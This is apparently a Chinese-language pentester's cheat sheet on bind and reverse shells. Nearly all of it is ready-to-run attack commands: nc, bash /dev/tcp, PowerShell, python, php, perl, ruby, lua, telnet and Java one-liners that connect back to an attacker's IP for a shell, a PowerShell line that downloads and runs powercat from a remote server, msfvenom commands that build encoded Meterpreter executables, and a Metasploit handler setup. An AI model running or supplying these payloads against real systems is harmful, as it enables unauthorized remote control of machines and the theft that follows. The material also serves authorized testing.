# 反弹shell

#### 正向shell

```
nc
目标机：
nc -lvp 4444 -e /bin/sh  //linux

nc -lvp 4444 -e cmd.exe  //windows

vps:
nc target-ip 4444
```

#### 反向shell

```
bash -i >& /dev/tcp/192.168.0.3/6666 0>&1

bash -c 'bash -i >& /dev/tcp/192.168.0.3/6666 0>&1'

bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/6667 <&1'

nc 192.168.2.2 11111 -e /bin/bash    //linux

nc 192.168.152.129 3333 -e cmd   //windows

powershell  -c "$client = New-Object Net.Sockets.TCPClient('10.10.10.39',44444);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"   //弹powershell

powershell IEX (New-Object Net.Webclient).DownloadString('http://47.94.9.xx/ps/powercat.ps1'); powercat -c 192.168.203.140 -p 9999 -e cmd   #弹cmd，powercat.ps1在kali中可以寻找


rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.2.2 4444 >/tmp/f  //vps会新开一个命令行

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.3 6666 0/tmp/p

mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe//测试失败

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.152.129",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("192.168.2.2",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="192.168.2.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.2.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.2.2","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e'f=TCPSocket.open("192.168.2.2",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' //连上就断，报sh: 1: 5: Bad file 

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.2.2','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"  //未测试

telnet 192.168.2.2 4444 | /bin/bash | telnet 192.168.2.2 5555  //4444端口执行命令，5555显示结果，开两个监听

public class Test {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.2.2/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

```

```
msf反弹shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.130 LPORT=6666 -f exe > dc.exe  
或
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.127 lport=12345 -f exe >as.exe//生成文件

python2 -m SimpleHTTPServer 8888   //开启http服务
msfconsole //开启msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 10.10.10.5 //vps ip
set lport 12345
run
shell

参数说明
-p –payload < payload> 指定需要使用的payload
-l payloads 查看所有的攻击载荷
-e –encoder [encoder] 指定需要使用的encoder
-i 5 –iterations <count> 指定payload的编码次数为5次
-f 生成文件格式
```

```
cs
```

#### 交互式shell

```
交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
```